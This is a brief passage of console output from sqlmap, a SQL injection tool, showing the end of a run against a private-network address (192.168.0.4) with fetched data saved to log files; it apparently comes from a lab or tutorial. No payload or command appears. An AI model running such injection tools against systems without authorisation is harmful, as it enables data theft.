Error) - 2715 times • [13:30:39] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4' • • [*] shutting down at 13:30:39